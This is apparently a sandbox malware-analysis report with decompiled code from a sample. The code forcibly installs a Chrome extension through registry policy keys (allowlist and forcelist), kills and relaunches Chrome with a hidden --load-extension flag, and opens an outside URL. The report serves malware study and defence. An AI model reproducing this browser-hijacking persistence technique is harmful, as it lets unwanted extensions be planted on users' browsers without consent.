ExitThread.KERNEL32 ref: 01002C22

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
String ID:
API String ID: 3182216644-0
Opcode ID: 1765f7136e157b40a43bed603cf334957c1fd1ccd69ed8d3ba354b6185930a34
Instruction ID: 18fe52377fac26b7c432b7086aaeaece24fc7935f6082dcf8b2c963badcd4a78
Opcode Fuzzy Hash: 1765f7136e157b40a43bed603cf334957c1fd1ccd69ed8d3ba354b6185930a34
Instruction Fuzzy Hash: C7D0173104020BABF6732BAAE90DA5A3AD9BB45624F050468BBC4885E8DF69E4D5C624

Uniqueness

Uniqueness Score: -1.00%

Function 01001BA6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01002B10: _vswprintf_s.LIBCMT ref: 01002B2B

GetFileAttributesW.KERNEL32(?), ref: 01001BCA
FindNextFileW.KERNELBASE(?,?), ref: 01001C7B

Strings

%s\Google\Chrome\User Data\%s\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 01001BAF

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: File$AttributesFindNext_vswprintf_s
String ID: %s\Google\Chrome\User Data\%s\Extensions\ecffbknobglofafinobbcmaionnihcma
API String ID: 1347245878-4178013715
Opcode ID: 40b11e7699c7ab7cb3b1e66d433001b8788d7e2b2fdf38f85b95fb0c1a58027e
Instruction ID: 8456703fee4f013905a361942687234e980df3fa605a61dce7f0bbedb83961d5
Opcode Fuzzy Hash: 40b11e7699c7ab7cb3b1e66d433001b8788d7e2b2fdf38f85b95fb0c1a58027e
Instruction Fuzzy Hash: C6210CF09482189BDB76DF64D8899A9B3B9FF58311F0085D9D45DA7294EB309B80DF00

Uniqueness

Uniqueness Score: -1.00%

Function 01001DD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01002B10: _vswprintf_s.LIBCMT ref: 01002B2B

ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000005), ref: 01001E20

Strings

--profile-directory="%s" --no-startup-window --load-extension="%s" --hide-crash-restore-bubble, xrefs: 01001DEE
open, xrefs: 01001E19

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: ExecuteShell_vswprintf_s
String ID: --profile-directory="%s" --no-startup-window --load-extension="%s" --hide-crash-restore-bubble$open
API String ID: 1340072267-2168600038
Opcode ID: c5cfdbdfa602968e13fbdcda4981a58bca4971dfcf169530479fd1f14f9d1126
Instruction ID: c04677b4738fd236cf66f5271b77c8f9d1a0191cac1b1f8a23dfefd252a7cbac
Opcode Fuzzy Hash: c5cfdbdfa602968e13fbdcda4981a58bca4971dfcf169530479fd1f14f9d1126
Instruction Fuzzy Hash: F411D6B08042A9AAFB77EA58CC54AED7778FB54710F0042C9E199570D1C770EF848F51

Uniqueness

Uniqueness Score: -1.00%

Function 01002199 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 010021A5

Part of subcall function 01002B10: _vswprintf_s.LIBCMT ref: 01002B2B

GetFileAttributesW.KERNELBASE(?), ref: 010021D6
RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallAllowlist,00000000,000F003F,?), ref: 0100220A

Strings

%s\Microsoft\EdgeCore\%s\msedge.exe, xrefs: 010021BB

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: AttributesFileOpen_memset_vswprintf_s
String ID: %s\Microsoft\EdgeCore\%s\msedge.exe
API String ID: 588096412-3013233320
Opcode ID: d87cdfb1e909230015fd6b3c274c7dffd01c71396a3c76a589377b5eb73d2fe5
Instruction ID: 45151a1dd600f83b42c879474731a292c9acc28561210e21500c370050638885
Opcode Fuzzy Hash: d87cdfb1e909230015fd6b3c274c7dffd01c71396a3c76a589377b5eb73d2fe5
Instruction Fuzzy Hash: F2F0E9F58082504ADB37E7685C548F8777DBB24230F480BC8F6FA420C2D6359784D751

Uniqueness

Uniqueness Score: -1.00%

Function 010019D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 28%

			E010019D1(signed char __ebx, void* __ecx, intOrPtr* __edx, intOrPtr* __edi, intOrPtr __esi) {
				long _t250;
				void* _t254;
				intOrPtr _t255;
				long _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				void* _t270;
				signed int _t274;
				short _t277;
				signed int _t282;
				short _t284;
				long _t291;
				void* _t292;
				intOrPtr _t316;
				short _t345;
				short _t348;
				void* _t355;
				void* _t374;
				signed char _t376;
				void* _t385;
				void* _t386;
				intOrPtr _t390;
				void* _t391;
				void* _t399;
				intOrPtr _t432;
				void* _t439;
				signed int _t441;
				void* _t442;
				void* _t443;
				WCHAR* _t445;
				void* _t462;
				intOrPtr* _t478;
				intOrPtr _t479;
				signed int _t481;
				void* _t484;
				void* _t485;
				void* _t486;
				void* _t487;
				void* _t488;
				void* _t490;
				void* _t492;
				long _t496;
				void* _t497;
				short _t499;
				void* _t500;
				int _t504;

				_t479 = __esi;
				_t478 = __edi;
				_t376 = __ebx;
				 *((intOrPtr*)(__ecx + 0x68))();
				asm("aas");
				 *__edi =  *__edi + __ecx;
				 *__edx =  *__edx + __ecx;
				_t250 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Google\\Chrome\\Extensions", ??, ??, ??); // executed
				 *(_t481 - 0x3540) = _t250;
				_t496 =  *(_t481 - 0x3540);
				if(_t496 == 0) {
					asm("clc");
					if(_t496 < 0) {
						0xf99082e9();
					}
					RegDeleteKeyW( *(_t481 - 0x214), L"ecffbknobglofafinobbcmaionnihcma");
					asm("clc");
					if(_t496 < 0) {
						0xed85a600();
					}
					_t374 =  *(_t481 - 0x214);
					 *((intOrPtr*)(_t374 - 1))();
					asm("adc eax, 0x101d274");
					asm("clc");
					if(_t496 < 0) {
						0x80039912();
					}
				}
				if(_t496 > 0 && _t496 <= 0) {
					0x16a1f9a();
				}
				_t378 = _t481 - 0x420;
				ShellExecuteW(0, L"open", _t481 - 0x420, L" https://getfiles.wiki/welcome.php", 0, 5); // executed
				asm("clc");
				if(_t496 < 0) {
					0x1c588339();
				}
				Sleep(0x1b58); // executed
				if(_t496 != 0 && _t496 == 0) {
				}
				_t432 =  *0x101d264; // 0x145f9e0
				E01002B10(_t378, _t481 - 0x210, L"%s\\Google\\Chrome\\User Data\\*.*", _t432);
				_t485 = _t484 + 0xc;
				if(_t496 != 0 && _t496 == 0) {
				}
				_t254 = FindFirstFileW(_t481 - 0x210, _t481 - 0xa88); // executed
				 *(_t481 - 0x332c) = _t254;
				if(_t496 != 0 && _t496 == 0) {
				}
				 *(_t481 - 0x353c) = 0;
				_t255 =  *0x101d264; // 0x145f9e0
				_t380 = _t481 - 0x210;
				E01002B10(_t481 - 0x210, _t481 - 0x210, L"%s\\Google\\Chrome\\User Data\\Default\\Extensions\\ecffbknobglofafinobbcmaionnihcma", _t255);
				_t486 = _t485 + 0xc;
				_t257 = GetFileAttributesW(_t481 - 0x210); // executed
				_t497 = _t257 - 0xffffffff;
				if(_t497 == 0) {
					if(_t497 != 0 && _t497 == 0) {
						0xffc8();
					}
					 *((intOrPtr*)(_t481 - 0x3764)) = L"Default";
					 *(_t481 - 0x3768) = _t481 +  *(_t481 - 0x353c) * 0x208 - 0x3328;
					 *(_t481 - 0x376c) =  *(_t481 - 0x3768);
					 *(_t481 - 0x353c) =  *(_t481 - 0x353c) + 1;
					 *(_t481 - 0x3770) =  *(_t481 - 0x376c);
					do {
						 *((short*)(_t481 - 0x3772)) =  *((intOrPtr*)( *((intOrPtr*)(_t481 - 0x3764))));
						 *( *(_t481 - 0x376c)) =  *((intOrPtr*)(_t481 - 0x3772));
						 *((intOrPtr*)(_t481 - 0x3764)) =  *((intOrPtr*)(_t481 - 0x3764)) + 2;
						_t380 =  &( *(_t481 - 0x376c)->dwFileAttributes);
						 *(_t481 - 0x376c) =  &( *(_t481 - 0x376c)->dwFileAttributes);
						_t499 =  *((short*)(_t481 - 0x3772));
					} while (_t499 != 0);
					if(_t499 != 0 && _t499 == 0) {
						0x9a02();
					}
				}
				if(_t499 != 0 && _t499 == 0) {
					0xe801();
				}
				do {
					if(_t499 != 0 && _t499 == 0) {
						0x1fa2bec();
					}
					_t258 = E01002B60(_t481 - 0xa5c, L"Profile ");
					_t486 = _t486 + 8;
					_t500 = _t258;
					if(_t500 != 0) {
						asm("clc");
						if(_t500 < 0) {
							0xa585a98c();
						}
						_t355 = _t481 - 0xa5c;
						 *((intOrPtr*)(_t355 - 0x75))();
						E01002B10(_t380, _t481 - 0x210, L"%s\\Google\\Chrome\\User Data\\%s\\Extensions\\ecffbknobglofafinobbcmaionnihcma", _t380);
						_t486 = _t486 + 0x10;
						if(GetFileAttributesW(_t481 - 0x210) == 0xffffffff) {
							 *((intOrPtr*)(_t481 - 0x3778)) = _t481 - 0xa5c;
							 *((intOrPtr*)(_t481 - 0x377c)) = _t481 +  *(_t481 - 0x353c) * 0x208 - 0x3328;
							 *((intOrPtr*)(_t481 - 0x3780)) =  *((intOrPtr*)(_t481 - 0x377c));
							 *(_t481 - 0x353c) =  *(_t481 - 0x353c) + 1;
							 *((intOrPtr*)(_t481 - 0x3784)) =  *((intOrPtr*)(_t481 - 0x3780));
							do {
								 *((short*)(_t481 - 0x3786)) =  *((intOrPtr*)( *((intOrPtr*)(_t481 - 0x3778))));
								 *((short*)( *((intOrPtr*)(_t481 - 0x3780)))) =  *((intOrPtr*)(_t481 - 0x3786));
								 *((intOrPtr*)(_t481 - 0x3778)) =  *((intOrPtr*)(_t481 - 0x3778)) + 2;
								 *((intOrPtr*)(_t481 - 0x3780)) =  *((intOrPtr*)(_t481 - 0x3780)) + 2;
							} while ( *((short*)(_t481 - 0x3786)) != 0);
						}
					}
					_t380 = _t481 - 0xa88;
					_t436 =  *(_t481 - 0x332c);
					_t259 = FindNextFileW( *(_t481 - 0x332c), _t481 - 0xa88); // executed
					_t504 = _t259;
				} while (_t504 != 0);
				if(_t504 != 0 && _t504 == 0) {
					0xffca();
				}
				if( *(_t481 - 0x353c) != 0) {
					if(__eflags > 0 && __eflags <= 0) {
						0x2d28149();
					}
					_t260 =  *0x101d264; // 0x145f9e0
					_t385 = _t481 - 0x3538;
					E01002B10(_t385, _t385, L"%s\\ServiceApp\\apps-helper", _t260);
					_t487 = _t486 + 0xc;
					asm("clc");
					if(__eflags < 0) {
						0xc995aaae();
					}
					E01002B10(_t385, _t481 - 0x3748, L"%s\\edge.crx", _t481 - 0x3538);
					_t488 = _t487 + 0xc;
					asm("clc");
					if(__eflags < 0) {
						0xfc8085ce();
					}
					E01001270(__eflags, 0x80000002, L"SOFTWARE\\Policies\\Google\\Chrome\\ExtensionInstallAllowlist", "6", L"ecffbknobglofafinobbcmaionnihcma"); // executed
					if(__eflags != 0) {
						if (__eflags != 0) goto L61;
						__eflags = _t385 + _t481;
					}
					_t386 = _t481 - 0x3748;
					E01001270(__eflags, 0x80000002, L"SOFTWARE\\Google\\Chrome\\Extensions\\ecffbknobglofafinobbcmaionnihcma", L"path", _t386); // executed
					if(__eflags != 0 && __eflags == 0) {
						0x100();
					}
					E01001270(__eflags, 0x80000002, L"SOFTWARE\\Google\\Chrome\\Extensions\\ecffbknobglofafinobbcmaionnihcma", L"version", L"1.0"); // executed
					asm("clc");
					if(__eflags < 0) {
						0xb995ab2b();
					}
					E01001270(__eflags, 0x80000002, L"SOFTWARE\\WOW6432Node\\Google\\Chrome\\Extensions\\ecffbknobglofafinobbcmaionnihcma", L"path", _t481 - 0x3748); // executed
					if(__eflags != 0 && __eflags == 0) {
						0x100();
					}
					E01001270(__eflags, 0x80000002, L"SOFTWARE\\WOW6432Node\\Google\\Chrome\\Extensions\\ecffbknobglofafinobbcmaionnihcma", L"version", L"1.0"); // executed
					asm("clc");
					if(__eflags < 0) {
						0xdd85ab6a();
					}
					_t270 = E01001330(_t376, _t479, L" /IM chrome.exe", _t481 - 0x424); // executed
					if(__eflags != 0) {
						if (__eflags != 0) goto L75;
						__eflags = _t270 + _t481;
					}
					Sleep(0x2bc); // executed
					asm("clc");
					if(__eflags < 0) {
						0xb585e590();
					}
					 *(_t481 - 0x374c) = 0;
					while(1) {
						_t439 =  *(_t481 - 0x374c);
						__eflags = _t439 -  *(_t481 - 0x353c);
						if(__eflags >= 0) {
							break;
						}
						if (__eflags == 0) goto L84;
						__eflags = _t479 +  *((intOrPtr*)(_t481 + 1));
					}
					if(__eflags > 0 && __eflags <= 0) {
						0xc9b0a3fd();
					}
					 *(_t481 - 0x3750) = 0;
					__eflags =  *(_t481 - 0x3750) -  *(_t481 - 0x353c);
					if(__eflags >= 0) {
						Sleep(0x1388); // executed
						if(__eflags != 0 && __eflags == 0) {
						}
						E01001270(__eflags, 0x80000002, L"SOFTWARE\\Policies\\Google\\Chrome\\ExtensionInstallForcelist", "6", L"ecffbknobglofafinobbcmaionnihcma"); // executed
						asm("clc");
						if(__eflags < 0) {
							0x27887eb();
						}
						E01001270(__eflags, 0x80000002, L"SOFTWARE\\WOW6432Node\\Policies\\Google\\Chrome\\ExtensionInstallForcelist", "6", L"ecffbknobglofafinobbcmaionnihcma"); // executed
						Sleep(0x1388); // executed
						_t436 = _t481 - 0x424;
						E01001330(_t376, _t479, L" /F /IM chrome.exe /T", _t481 - 0x424); // executed
						if(__eflags != 0 && __eflags == 0) {
							0xfc4d();
						}
						_t274 = 0;
						__eflags = 0;
						goto L113;
					} else {
						if(__eflags != 0 && __eflags == 0) {
							0xc9b0b3ef();
						}
						_t441 =  *(_t481 - 0x3750) * 0x208;
						__eflags = _t441;
						_push(_t481 + _t441 - 0x3328);
						_t390 =  *0x101d264; // 0x145f9e0
						_t442 = _t481 - 0x630;
						_t277 = E01002B10(_t390, _t442, L"%s\\Google\\Chrome\\User Data\\%s\\Extensions\\ecffbknobglofafinobbcmaionnihcma\\1.0_0\\src\\jquery-3.5.1.min.js", _t390);
						_t490 = _t488 + 0x10;
						if(__eflags != 0 && __eflags == 0) {
						}
						while(1) {
							_t376 = _t376 >> 0xff;
							_t107 = _t390 + 2; // 0x2e0000
							__eflags = _t277 - 1 -  *_t107;
							if(_t277 - 1 !=  *_t107) {
								goto L123;
							}
							 *(_t481 - 0x3fbc) =  *(_t481 - 0x3fbc) + 4;
							 *((intOrPtr*)(_t481 - 0x3fb8)) =  *((intOrPtr*)(_t481 - 0x3fb8)) + 4;
							__eflags =  *((short*)(_t481 - 0x3fc0));
							if( *((short*)(_t481 - 0x3fc0)) != 0) {
								L117:
								_t442 =  *(_t481 - 0x3fbc);
								_t284 =  *_t442;
								 *((short*)(_t481 - 0x3fbe)) = _t284;
								__eflags = _t284 -  *((intOrPtr*)( *((intOrPtr*)(_t481 - 0x3fb8))));
								if(_t284 !=  *((intOrPtr*)( *((intOrPtr*)(_t481 - 0x3fb8))))) {
									goto L123;
								} else {
									__eflags =  *((short*)(_t481 - 0x3fbe));
									if( *((short*)(_t481 - 0x3fbe)) == 0) {
										goto L122;
									} else {
										_t442 =  *(_t481 - 0x3fbc);
										_t277 =  *((intOrPtr*)(_t442 + 2));
										 *((short*)(_t481 - 0x3fc0)) = _t277;
										_t390 =  *((intOrPtr*)(_t481 - 0x3fb8));
										continue;
									}
								}
							} else {
								L122:
								 *(_t481 - 0x3fc4) = 0;
							}
							L124:
							 *(_t481 - 0x3fc8) =  *(_t481 - 0x3fc4);
							__eflags =  *(_t481 - 0x3fc8);
							if( *(_t481 - 0x3fc8) != 0) {
								 *((intOrPtr*)(_t481 - 0x3fcc)) = L"..";
								 *(_t481 - 0x3fd0) = _t481 - 0x3d74;
								while(1) {
									_t462 =  *(_t481 - 0x3fd0);
									_t345 =  *_t462;
									 *((short*)(_t481 - 0x3fd2)) = _t345;
									__eflags = _t345 -  *((intOrPtr*)( *((intOrPtr*)(_t481 - 0x3fcc))));
									if(_t345 !=  *((intOrPtr*)( *((intOrPtr*)(_t481 - 0x3fcc))))) {
										break;
									}
									__eflags =  *((short*)(_t481 - 0x3fd2));
									if( *((short*)(_t481 - 0x3fd2)) == 0) {
										L130:
										 *(_t481 - 0x3fd8) = 0;
									} else {
										_t462 =  *(_t481 - 0x3fd0);
										_t348 =  *((intOrPtr*)(_t462 + 2));
										 *((short*)(_t481 - 0x3fd4)) = _t348;
										_t129 =  *((intOrPtr*)(_t481 - 0x3fcc)) + 2; // 0x2e
										__eflags = _t348 -  *_t129;
										if(_t348 !=  *_t129) {
											break;
										} else {
											 *(_t481 - 0x3fd0) =  *(_t481 - 0x3fd0) + 4;
											 *((intOrPtr*)(_t481 - 0x3fcc)) =  *((intOrPtr*)(_t481 - 0x3fcc)) + 4;
											__eflags =  *((short*)(_t481 - 0x3fd4));
											if( *((short*)(_t481 - 0x3fd4)) != 0) {
												continue;
											} else {
												goto L130;
											}
										}
									}
									L132:
									 *(_t481 - 0x3fdc) =  *(_t481 - 0x3fd8);
									__eflags =  *(_t481 - 0x3fdc);
									if(__eflags != 0) {
										if(__eflags != 0 && __eflags == 0) {
											0xffc2();
										}
										E01002B40(_t481 - 0x3938, _t481 - 0x3d74);
										_t490 = _t490 + 8;
										if(__eflags != 0 && __eflags == 0) {
										}
									}
									while(1) {
										L139:
										_t391 =  *(_t481 - 0x3fac);
										_t282 = FindNextFileW(_t391, _t481 - 0x3da0);
										__eflags = _t282;
										if(__eflags == 0) {
											break;
										}
										__eflags =  *(_t481 - 0x3da0) - 0x10;
										 *_t282();
										if(__eflags == 0) {
											 *((intOrPtr*)(_t481 - 0x3fb8)) = ".";
											 *(_t481 - 0x3fbc) = _t481 - 0x3d74;
											goto L117;
										}
									}
									_t443 =  *(_t481 - 0x3fac);
									FindClose(_t443);
									if(__eflags != 0 && __eflags == 0) {
										0x8589();
									}
									__eflags = 0;
									 *(_t481 - 0x3730) = 0;
									_push(0x206);
									 *_t443 = _t391 +  *_t443;
									_push(_t481 - 0x372e);
									E01007BE0(_t478);
									_push(_t481 - 0x3938);
									_t399 = _t481 - 0x3730;
									E01002B10(_t399, _t399, L"%s\\Microsoft\\EdgeCore\\%s\\msedge.exe", _t481 - 0x420);
									_t492 = _t490 + 0x1c;
									_t445 = _t481 - 0x3730;
									_t291 = GetFileAttributesW(_t445); // executed
									__eflags = _t291 - 0xffffffff;
									if(__eflags != 0) {
										if(__eflags != 0 && __eflags == 0) {
											0xfeeca783();
										}
										_t292 = _t481 - 0x214;
										 *((intOrPtr*)(_t292 + 0x68))();
										asm("aas");
										 *_t478 =  *_t478 + _t399;
										 *_t445 =  *_t445 + _t399;
										__eflags =  *_t445;
										 *(_t481 - 0x3b50) = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Policies\\Microsoft\\Edge\\ExtensionInstallAllowlist", ??, ??, ??);
										if(__eflags != 0 && __eflags == 0) {
										}
										__eflags =  *(_t481 - 0x3b50);
										_t155 = _t481 + 0x2f;
										 *_t155 = _t445 +  *(_t481 + 0x2f);
										__eflags =  *_t155;
									} else {
										asm("clc");
										if(__eflags < 0) {
											0xeac055d1();
										}
										_t316 = 0;
									}
									__eflags =  *(_t481 - 4) ^ _t481;
									return E01002B7C(_t316, _t376,  *(_t481 - 4) ^ _t481, _t450, _t478, _t479);
									goto L296;
								}
								asm("sbb edx, edx");
								asm("sbb edx, 0xffffffff");
								 *(_t481 - 0x3fd8) = _t462;
								goto L132;
							}
							goto L139;
							L123:
							asm("sbb edx, edx");
							asm("sbb edx, 0xffffffff");
							 *(_t481 - 0x3fc4) = _t442;
							goto L124;
						}
					}
				} else {
					_t274 = 0;
					L113:
					return E01002B7C(_t274, _t376,  *(_t481 - 4) ^ _t481, _t436, _t478, _t479);
				}
				L296:
			}

0x010019d1
0x010019d1
0x010019d1
0x010019d1
0x010019d4
0x010019d5
0x010019d7
0x010019e4
0x010019ea
0x010019f0
0x010019f7
0x010019f9
0x010019fa
0x010019fc
0x010019fc
0x01001a0a
0x01001a10
0x01001a11
0x01001a13
0x01001a13
0x01001a15
0x01001a1a
0x01001a1d
0x01001a22
0x01001a23
0x01001a25
0x01001a25
0x01001a23
0x01001a27
0x01001a2b
0x01001a2b
0x01001a35
0x01001a43
0x01001a49
0x01001a4a
0x01001a4c
0x01001a4c
0x01001a53
0x01001a59
0x01001a59
0x01001a5e
0x01001a71
0x01001a76
0x01001a79
0x01001a79
0x01001a8c
0x01001a92
0x01001a98
0x01001a98
0x01001a9d
0x01001aa7
0x01001ab2
0x01001ab9
0x01001abe
0x01001ac8
0x01001ace
0x01001ad1
0x01001ad7
0x01001adb
0x01001adb
0x01001add
0x01001afa
0x01001b06
0x01001b15
0x01001b21
0x01001b27
0x01001b30
0x01001b44
0x01001b50
0x01001b5c
0x01001b5f
0x01001b65
0x01001b65
0x01001b6f
0x01001b73
0x01001b73
0x01001b6f
0x01001b75
0x01001b79
0x01001b79
0x01001b7b
0x01001b7b
0x01001b7f
0x01001b7f
0x01001b8c
0x01001b91
0x01001b94
0x01001b96
0x01001b9c
0x01001b9d
0x01001b9f
0x01001b9f
0x01001ba1
0x01001ba6
0x01001bbb
0x01001bc0
0x01001bd3
0x01001bdf
0x01001bf8
0x01001c04
0x01001c13
0x01001c1f
0x01001c25
0x01001c2e
0x01001c42
0x01001c4e
0x01001c5d
0x01001c63
0x01001c25
0x01001bd3
0x01001c6d
0x01001c74
0x01001c7b
0x01001c81
0x01001c81
0x01001c89
0x01001c8d
0x01001c8d
0x01001c96
0x01001c9f
0x01001ca3
0x01001ca3
0x01001ca4
0x01001caf
0x01001cb6
0x01001cbb
0x01001cbe
0x01001cbf
0x01001cc1
0x01001cc1
0x01001cd6
0x01001cdb
0x01001cde
0x01001cdf
0x01001ce1
0x01001ce1
0x01001cf7
0x01001cfc
0x01001cfe
0x01001cff
0x01001cff
0x01001d01
0x01001d17
0x01001d1c
0x01001d20
0x01001d20
0x01001d36
0x01001d3b
0x01001d3c
0x01001d3e
0x01001d3e
0x01001d56
0x01001d5b
0x01001d5f
0x01001d5f
0x01001d75
0x01001d7a
0x01001d7b
0x01001d7d
0x01001d7d
0x01001d8b
0x01001d90
0x01001d92
0x01001d93
0x01001d93
0x01001d9a
0x01001da0
0x01001da1
0x01001da3
0x01001da3
0x01001da5
0x01001dc0
0x01001dc0
0x01001dc6
0x01001dcc
0x00000000
0x00000000
0x01001dce
0x01001dcf
0x01001dcf
0x01001e2d
0x01001e31
0x01001e31
0x01001e32
0x01001e53
0x01001e59
0x01001ed7
0x01001edd
0x01001edd
0x01001ef6
0x01001efb
0x01001efc
0x01001efe
0x01001efe
0x01001f14
0x01001f1e
0x01001f24
0x01001f30
0x01001f35
0x01001f39
0x01001f39
0x01001f3b
0x01001f3b
0x00000000
0x01001e5b
0x01001e5b
0x01001e5f
0x01001e5f
0x01001e66
0x01001e66
0x01001e73
0x01001e74
0x01001e80
0x01001e87
0x01001e8c
0x01001e8f
0x01001e8f
0x01002050
0x01002051
0x01002054
0x01002054
0x01002058
0x00000000
0x00000000
0x0100205a
0x01002061
0x01002068
0x01002070
0x01002018
0x01002018
0x0100201e
0x01002021
0x0100202e
0x01002031
0x00000000
0x01002033
0x01002033
0x0100203b
0x00000000
0x0100203d
0x0100203d
0x01002043
0x01002047
0x0100204e
0x00000000
0x0100204e
0x0100203b
0x01002072
0x01002072
0x01002072
0x01002072
0x01002089
0x0100208f
0x01002095
0x0100209c
0x010020a2
0x010020b2
0x010020b8
0x010020b8
0x010020be
0x010020c1
0x010020ce
0x010020d1
0x00000000
0x00000000
0x010020d3
0x010020db
0x01002112
0x01002112
0x010020dd
0x010020dd
0x010020e3
0x010020e7
0x010020f4
0x010020f4
0x010020f8
0x00000000
0x010020fa
0x010020fa
0x01002101
0x01002108
0x01002110
0x00000000
0x00000000
0x00000000
0x00000000
0x01002110
0x010020f8
0x01002129
0x0100212f
0x01002135
0x0100213c
0x0100213e
0x01002142
0x01002142
0x01002152
0x01002157
0x0100215a
0x0100215a
0x0100215a
0x0100215f
0x0100215f
0x01002166
0x0100216d
0x01002173
0x01002175
0x00000000
0x00000000
0x01001ff5
0x01001ffa
0x01001ffc
0x01002002
0x01002012
0x00000000
0x01002012
0x01001ffc
0x0100217b
0x01002182
0x01002188
0x0100218c
0x0100218c
0x0100218e
0x01002190
0x01002197
0x0100219b
0x010021a4
0x010021a5
0x010021b3
0x010021c0
0x010021c7
0x010021cc
0x010021cf
0x010021d6
0x010021dc
0x010021df
0x010021ed
0x010021f1
0x010021f1
0x010021f2
0x010021f7
0x010021fa
0x010021fb
0x010021fd
0x010021fd
0x01002210
0x01002216
0x01002216
0x0100221b
0x01002221
0x01002221
0x01002221
0x010021e1
0x010021e1
0x010021e2
0x010021e4
0x010021e4
0x010021e6
0x010021e6
0x01002931
0x0100293b
0x00000000
0x0100293b
0x0100211e
0x01002120
0x01002123
0x00000000
0x01002123
0x00000000
0x0100207e
0x0100207e
0x01002080
0x01002083
0x00000000
0x01002083
0x01002050
0x01001c98
0x01001c98
0x01001f3d
0x01001f4a
0x01001f4a
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Google\Chrome\Extensions,00000000,000F003F,?), ref: 010019E4
RegDeleteKeyW.ADVAPI32(?,ecffbknobglofafinobbcmaionnihcma), ref: 01001A0A

Strings

SOFTWARE\Google\Chrome\Extensions, xrefs: 010019DA

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: DeleteOpen
String ID: SOFTWARE\Google\Chrome\Extensions
API String ID: 3632437661-3566514512
Opcode ID: 0f2064f1ce09fd4770b33ad239f424443fc882a17413397bdb49442a3cb60bd1
Instruction ID: c183edb76c19b3dccaa24130fa5eccb5e6134d580697b8337a670f5f851eeb6f
Opcode Fuzzy Hash: 0f2064f1ce09fd4770b33ad239f424443fc882a17413397bdb49442a3cb60bd1
Instruction Fuzzy Hash: 57E09A70805356ABDB275F708C0C29CBA64AB22631F244BCAE1B9920E3D379C2C1CB06

Uniqueness

Uniqueness Score: -1.00%

Function 01001270 Relevance: 4.6, APIs: 3, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,000F003F,?), ref: 010012A3
RegSetValueExW.KERNELBASE(?,?,00000000,00000001,00000002,?), ref: 010012F8
RegCloseKey.KERNELBASE(?), ref: 0100130A

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

